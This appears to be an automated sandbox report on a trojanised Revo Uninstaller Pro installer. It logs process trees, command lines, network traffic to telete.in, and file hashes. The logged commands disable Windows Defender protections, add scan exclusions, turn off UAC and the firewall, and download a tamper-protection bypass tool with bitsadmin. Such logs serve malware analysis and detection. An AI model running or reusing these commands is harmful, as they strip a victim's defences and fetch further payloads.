PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\rundll32.exe
PID 3340 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\rundll32.exe
PID 708 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\runonce.exe
PID 708 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\runonce.exe
PID 968 wrote to memory of 3264 N/A C:\Windows\system32\runonce.exe C:\Windows\System32\grpconv.exe
PID 968 wrote to memory of 3264 N/A C:\Windows\system32\runonce.exe C:\Windows\System32\grpconv.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$C0060,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "

C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3024A,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\system32\rundll32.exe

"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\system32\regsvr32.exe

"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "

C:\Windows\SysWOW64\mode.com

mode 65,10

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Windows\SysWOW64\timeout.exe

timeout /T 180 /NOBREAK

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 telete.in udp
US 199.59.243.227:443 telete.in tcp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp

Files

memory/4092-0-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4092-2-0x0000000000401000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

MD5 d0e24e6d7017127bea02bb0160229bee
SHA1 34350e5b7f268797b2a7ec56390c2228f841b37b
SHA256 ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512 f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

memory/4540-6-0x0000000000400000-0x0000000000689000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-F7UCB.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

MD5 c84933bcccf41369ef9ecce015b86ed0
SHA1 624713276ae217d8d05c03598eecd31209c7f77a
SHA256 ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

MD5 b0a7842dd51df8942bc8b837282d1c2b
SHA1 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA256 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512 b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

MD5 dc21d689cfa1860e8820ed0ee45b1f2a
SHA1 acf2db6df76114601a2e58097629e0c8cbce129b
SHA256 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512 a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

memory/3948-33-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp

MD5 74f1186a6d3bc01716681712c6b24a74
SHA1 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18
SHA256 d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d
SHA512 bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

memory/4540-51-0x0000000000400000-0x0000000000689000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\iswin7logo.dll

MD5 1ea948aad25ddd347d9b80bef6df9779
SHA1 0be971e67a6c3b1297e572d97c14f74b05dafed3
SHA256 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512 f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

memory/3340-56-0x00000000748B0000-0x00000000748CB000-memory.dmp

memory/4092-68-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/3340-71-0x0000000075660000-0x0000000075671000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

memory/3340-75-0x0000000007390000-0x000000000739F000-memory.dmp

memory/1572-80-0x0000000004AA0000-0x0000000004AD6000-memory.dmp

memory/1572-81-0x0000000005130000-0x0000000005758000-memory.dmp

memory/1572-82-0x0000000004F80000-0x0000000004FA2000-memory.dmp

memory/1572-83-0x0000000005860000-0x00000000058C6000-memory.dmp

memory/1572-84-0x00000000059C0000-0x0000000005A26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pyjodul3.kdv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1572-94-0x0000000005B40000-0x0000000005E94000-memory.dmp

memory/1572-95-0x0000000006040000-0x000000000605E000-memory.dmp

memory/1572-96-0x00000000060E0000-0x000000000612C000-memory.dmp

memory/1572-97-0x0000000007010000-0x0000000007042000-memory.dmp

memory/1572-98-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/1572-108-0x0000000006610000-0x000000000662E000-memory.dmp

memory/1572-109-0x0000000007050000-0x00000000070F3000-memory.dmp

memory/1572-110-0x00000000079B0000-0x000000000802A000-memory.dmp

memory/1572-111-0x0000000007370000-0x000000000738A000-memory.dmp

memory/1572-112-0x00000000073E0000-0x00000000073EA000-memory.dmp

memory/1572-113-0x00000000075F0000-0x0000000007686000-memory.dmp

memory/1572-114-0x0000000007570000-0x0000000007581000-memory.dmp

memory/1572-115-0x00000000075A0000-0x00000000075AE000-memory.dmp

memory/1572-116-0x00000000075B0000-0x00000000075C4000-memory.dmp

memory/1572-117-0x00000000076B0000-0x00000000076CA000-memory.dmp

memory/1572-118-0x0000000007690000-0x0000000007698000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/4312-131-0x0000000005FB0000-0x0000000006304000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6bff6adce2a7cc1a2f331061641c82f3
SHA1 80cc8d381b16b0ea86894252fffefcc206b403ce
SHA256 a02ca11204d69c3430a630540209bd89886b8106614bfaac0eb0e1dc8e6a7f9f
SHA512 e3652c9cb68566c281d62e78a6494a215349c41a58d01ac0c4f1e909af3ce07f1c57bc2834e3d2ad584a1fbecdbdeb81fab4d7ff80c91b98920d219ca87e77ef

memory/4312-133-0x0000000006970000-0x00000000069BC000-memory.dmp

memory/4312-134-0x000000006F700000-0x000000006F74C000-memory.dmp

memory/4312-144-0x00000000077B0000-0x0000000007853000-memory.dmp

memory/4312-145-0x0000000007A60000-0x0000000007A71000-memory.dmp

memory/3948-146-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4692-150-0x0000000005830000-0x0000000005B84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73909591451d3d1f7c6e353a52ce7afa
SHA1 f7f0badcda6bbe4666233728e4fc57e2061ff911
SHA256 938ed00289d478f6234221da4c836e4ed5b281d75f28aa27e737ca92d98e0a24
SHA512 3b292f129ffac3333897ddbc488b5ce84a31095b1c6ae9736ef21bfd359ea51c5da99ccd7af62395133a5abfb273ed43cfb92c48857b6865b24a1f27ef52ceec

memory/3340-159-0x0000000000400000-0x0000000000509000-memory.dmp

memory/3340-162-0x0000000007390000-0x000000000739F000-memory.dmp

memory/3340-160-0x00000000748B0000-0x00000000748CB000-memory.dmp

memory/3340-161-0x0000000075660000-0x0000000075671000-memory.dmp

memory/4692-163-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 759d93b25e23ab1faa35f2e13b3adb9e
SHA1 325cee68c2765b166c648374b6ad6e07080ec03c
SHA256 46da386d4198c126a60b8c3b293c674ce8b844c7b0893a6956638947a9797e32
SHA512 89090bc8dff1a9ddfae2cf37eab5d72ba6f88c2ea5241932cba550c6d024604726d49eceda2aa833f84d2220866102224e8f0af241f47a04604a936faa5f2899

memory/636-184-0x0000000006BC0000-0x0000000006BE2000-memory.dmp

memory/636-185-0x0000000007F50000-0x00000000084F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 16e084bc764dbfb34c262d32abb743e6
SHA1 1ce50039217fca8441984a5f79ebf4db9da5354d
SHA256 a3c01d310fd888da1f2ceccfe4bbedd2d139bd66da10cb68914f0fc4153ad599
SHA512 ff67806345700e42bb205cd471011cd7b88f2aff01bba27eea6c4062c6cde059f3a6b8d8d9c94ccc51bc5cd91d4aea24d7d832f5d186d37c869f215483987b02

memory/1200-197-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6190fc29490068464249b428f75047d6
SHA1 e5f555b2985167e13f61907cf9a00a78a0c7dd76
SHA256 3cde051d26ea7c7073a3e73c0e903cd5aa60b8e502573e8e0c7391effb6588bc
SHA512 81d0999325fdd3ee61044abf7698a45ba6d6fb00e9474fdd30c08d3414063d62bbdb3c620e722db7e613200378380c49218a8d52b040386372aaab4f311e0ab4

memory/3856-218-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 46057eda4d28b17e51e7e708dd570c9a
SHA1 6a5d6a620dd326ccc6c6f4759118de9b4b90ce74
SHA256 0c94c7500f261fe14483f1c927f08e26980c1e5dd0bf83e866cdda1c8a7adcf3
SHA512 99f4ce7532a5ac71e47de3e43457db1a23227153eea7188d0ec7c4f853b8132ee5ba5828d4fffed040709722f532f19992f4fdbb8261df58c6e9f85fc89beb27

memory/964-239-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e76c39db445edb5e1a4d1ec43e5567d0
SHA1 be398199fa043840a69b17fe545b9b4ca8dc35ab
SHA256 5ea7746b6096f671aae5f55739cacfb28fee391cc4ef2d8774b2e1d3398c06c6
SHA512 fe3a17fcdfe275d3cbd44d3afea97034c17f3fd88d7c2247b4369fe9b24372e9f1dbc732f4cb6b0196eef5aca0f55b8b5076f0f0d81f1c976981ff2ab5feccf8

memory/1136-260-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/3340-262-0x0000000000400000-0x0000000000509000-memory.dmp

memory/2932-285-0x0000000005E60000-0x00000000061B4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1c7a7ac4d02de7177598e568cd1cf811
SHA1 a72c865aca9bb5034cb5b9f56101cb330653c61d
SHA256 d3bf5a804a6d2d95837e77f97201cbaec19bb44672d1da9e6e20f29cb2b30d7e
SHA512 4f50baff10680af724e45f69e448cec786dbea3d9c4c2f0f99bf6250f967de6bbd181a775e4280261505b7b0a03f97498065533314d23fbdd59064b8037225df

memory/2932-287-0x000000006F700000-0x000000006F74C000-memory.dmp

memory/2932-388-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 69e8bd332cc3ba76ca61bed2edc9759b
SHA1 a1c669b40ec3b1d77c1d8c553a052180d56cbc0b
SHA256 e9bf7274c49093fe06b4e6d46157f147810ab5906672c0c7bed5d3034fdc2e3a
SHA512 17d29612420080a16c6e4d59e8220eec106e308dfa4262c8835ba3cd9f47cd2c1a2538292568767a33a8917ea84029ca9c87a6167b858c19bc10b3a0b05bff72

memory/1520-408-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b05f5ec99e746efdb7dd9751579575d4
SHA1 07a3d6e33e7eb86404ed4b87ee7ad09899689e14
SHA256 a74004fe2aa75c4eee13fae7f6fc18ae9904239b214a3eac6779b6d6513d2488
SHA512 fd370f79dedcbd5f321bd87d273d2b098f94b243bff75adee6805495f16222ca54c4ba2bc39abb1618d1a2c87b162340b395dfc3b4dd39eeadd4425d407635c0

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

MD5 ddb041550a3e69764cd9d7d3de3636f3
SHA1 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA256 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA512 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

MD5 edc78deb34de240c787b1011161e9a4e
SHA1 2d31275530dce33d3bc329991c8ad59e1b303577
SHA256 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512 e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

memory/2012-456-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/2012-466-0x00000000079D0000-0x0000000007A73000-memory.dmp

C:\Windows\System32\drivers\revoflt.sys

MD5 498c3d4d44382a96812a0e0ff28d575b
SHA1 c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA256 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512 ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

memory/2012-471-0x0000000007E60000-0x0000000007E71000-memory.dmp

memory/2012-472-0x0000000007EA0000-0x0000000007EB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5a13c0d8b66ec62c774da9617d8b1fb
SHA1 17b1c8c5e9b29afe680c0675aac15712111ccc7a
SHA256 00ae712813cbadc4486db634b5524db7d5f5ff9680f5b0f588c2c90d03fd3316
SHA512 b0306fb83c35661fa9996674b9657d4b5fb593313ca4d299f92bb71e5b4e3770d79e7a3f166cbbd86b0b948d19a1d41117da5ce982f6dafdbd1731f09948833a

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

MD5 75d7bf3468669a6c3df6f4d048315128
SHA1 678d3b531738573520367b47c0cd52cf5e431fa0
SHA256 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA512 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

MD5 1dd8459f2595e4c0603ad491590f6952
SHA1 607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA256 5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512 c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

memory/4072-490-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/4072-500-0x00000000070E0000-0x0000000007183000-memory.dmp

memory/2596-501-0x0000000000400000-0x0000000000E32000-memory.dmp

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini

MD5 6c9dbe894ea20eb190db6b483f17030d
SHA1 1bac02001cba8c083b987264f1bb89b05b74155f
SHA256 24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846
SHA512 b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

memory/4072-506-0x0000000007420000-0x0000000007431000-memory.dmp

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini

MD5 c37fb8c46d0281dd27768fd1101614f0
SHA1 03e736a49687f9ac10b35cc791e7df5b7e55f4d8
SHA256 ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c
SHA512 b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

memory/3340-511-0x00000000748B0000-0x00000000748CB000-memory.dmp

memory/3340-510-0x0000000000400000-0x0000000000509000-memory.dmp

memory/4072-516-0x0000000007460000-0x0000000007474000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f4dd70c385c79cc5ebda9fe89100f210
SHA1 39b66e96adf422d6ce14416b291a8104a779261c
SHA256 1753d46a9bc3658056b8aa36a8a26cf7101dca212507a4f07cacca013afc9759
SHA512 64050203a854fe2fd366e1a81ecbe18e7da1eba98b44412fa4f369a51faa648f466ae510d872877d428d585e47082baf479d235b8d0d595e67176a2bdf69ab40

memory/2880-528-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4121c28f824fbc2d46c627f886c635da
SHA1 5137783aa9254147be2500b3f325e48fe700399d
SHA256 3e642f6f08a38ca17830880b2e11441b5dfa0ca1933ffcad96a1011f2c2c3777
SHA512 12351b348a1e4d86da96036a280c62917e6297e88faddb145b8176f0afd31b36667675db2c928729977c50645107d0ec6406ac3b09689a85c8ae6b1e6db4b288

memory/3340-562-0x0000000000400000-0x0000000000509000-memory.dmp

